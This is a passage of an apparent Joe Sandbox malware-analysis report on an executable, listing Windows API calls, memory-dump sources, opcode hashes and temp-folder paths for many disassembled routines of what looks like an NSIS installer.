                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                                                                                                    • Opcode ID: 285e3a41516205061d94006dff8b76d892c645100c7a324bb30c8f08c48eb8bd
                                                                                                                                                                                                                                    • Instruction ID: 2b6e019c34a0e878a4a6d85adce418a7d30950e3e5b978105fb9a0e9d95c0c27
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 285e3a41516205061d94006dff8b76d892c645100c7a324bb30c8f08c48eb8bd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31A233604101DFC7168F55CD98D2EB7BAEB8A31473445E8F201C32A0C774A82CAB59
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\2T10XBqS6g.exe,80000000,00000003), ref: 00406176
                                                                                                                                                                                                                                      • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(?,?), ref: 004029B6
                                                                                                                                                                                                                                      • Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004029D2
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                                                                                                                                                                      • Part of subcall function 00403376: SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?), ref: 00402A3A
                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402A4D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Global$AllocFreePointer$AttributesCloseCreateDeleteHandle
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 488507980-0
                                                                                                                                                                                                                                    • Opcode ID: 204759c9182e0998936d503b734cd0b716213fd5fb3e3302ef3dc1645524a30e
                                                                                                                                                                                                                                    • Instruction ID: ba218adf5694e25fd77313e1ccbbfbab35a2a379656f90145ff8969d650460ca
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 204759c9182e0998936d503b734cd0b716213fd5fb3e3302ef3dc1645524a30e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E218B71D00118BFCF21AFA4DD8989EBFB9EF08360B14422AF555762E1CB7949419F68
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404F58
                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: %u.%u%s%s$H/B
                                                                                                                                                                                                                                    • API String ID: 3540041739-2222257793
                                                                                                                                                                                                                                    • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                                                                                                                                                                                                    • Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 702525C2
                                                                                                                                                                                                                                      • Part of subcall function 702512CC: lstrcpynW.KERNEL32(00000000,?,7025137F,00000019,702511CA,-000000A0), ref: 702512DC
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(?), ref: 70252548
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70252563
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29621683909.0000000070251000.00000020.00000001.01000000.00000005.sdmp, Offset: 70250000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621638856.0000000070250000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621730229.0000000070254000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621783107.0000000070256000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_70250000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4216380887-0
                                                                                                                                                                                                                                    • Opcode ID: e9e368c155b103b2c38a7a90b738434283e203f8516ff646932388cb48d10b2a
                                                                                                                                                                                                                                    • Instruction ID: dab4fd2d4abdae84d6f787a18de7fc605edb2968abcb54b0821a0149a6db2e8e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9e368c155b103b2c38a7a90b738434283e203f8516ff646932388cb48d10b2a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7641ACB3104205EFD718DF24D854A2E77B8FB45310F60499DF946C62C0E774A96CDB69
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                                                                                                                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                                                                    • Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                                                                                                                                                                                                    • Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00401E56
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                                                                                                                    • Opcode ID: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                                                                                                                                                                                                    • Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,702522D8,?,00000808), ref: 702516D5
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(?,00000000,?,00000000,702522D8,?,00000808), ref: 702516DC
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,702522D8,?,00000808), ref: 702516F0
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(702522D8,00000000), ref: 702516F7
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70251700
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29621683909.0000000070251000.00000020.00000001.01000000.00000005.sdmp, Offset: 70250000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621638856.0000000070250000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621730229.0000000070254000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621783107.0000000070256000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_70250000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1148316912-0
                                                                                                                                                                                                                                    • Opcode ID: 6c3f0bd2c8382dbba29c23a145e0a58cd9f7028434d5b3d4f2865b25489c3659
                                                                                                                                                                                                                                    • Instruction ID: 3c96a491c76b74a8eea0a4dd223e941913960f4bc30b8aa5d8b63b80ed8204b8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c3f0bd2c8382dbba29c23a145e0a58cd9f7028434d5b3d4f2865b25489c3659
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEF012731061387BD62017A79C4CEABBE9CDF8B2F9B310255F718911E085615C01E7F5
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,75C53420,?,75C52EE0,00405DAE,?,75C53420,75C52EE0,"C:\Users\user\Desktop\2T10XBqS6g.exe"), ref: 0040600A
                                                                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 0040600F
                                                                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 00406027
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\nsb3903.tmp, xrefs: 00405FFD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharNext
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsb3903.tmp
                                                                                                                                                                                                                                    • API String ID: 3213498283-3692555289
                                                                                                                                                                                                                                    • Opcode ID: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                                                                                                                                                                                                    • Instruction ID: 6b36e5aaf6ec4384ffc5acae3f619c12edb839be27b3f0f06f1fa7befb24a934
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00F0963198061595DE31F6584C45A7767BCDF55394B02807BE602B71C1D7B888E186DA
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,?,0000000A,?), ref: 00405F57
                                                                                                                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,?,0000000A,?), ref: 00405F61
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00405F73
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                    • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                                    • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                                                                                    • Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29621683909.0000000070251000.00000020.00000001.01000000.00000005.sdmp, Offset: 70250000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621638856.0000000070250000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621730229.0000000070254000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621783107.0000000070256000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_70250000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                                                                                                    • Opcode ID: b0c94d7b477615d674c56ac4771ec32fb3c5285e34d8300662473b3bbe8ea195
                                                                                                                                                                                                                                    • Instruction ID: b609fb377867e51bb97c9b591341248585b2cd91f58d4b32970ac92f8f9cf952
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0c94d7b477615d674c56ac4771ec32fb3c5285e34d8300662473b3bbe8ea195
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39516E77600222DFD700CF69C859A2A77B8FB09314F6041D9FA46DB3A0E774AD28DB58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb3903.tmp\System.dll), ref: 0040269A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsb3903.tmp$C:\Users\user\AppData\Local\Temp\nsb3903.tmp\System.dll
                                                                                                                                                                                                                                    • API String ID: 1659193697-1051449860
                                                                                                                                                                                                                                    • Opcode ID: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                                                                                                                                                                                                    • Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000002E4,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403C74
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000002EC,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403C88
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\nsb3903.tmp, xrefs: 00403C98
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C67
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
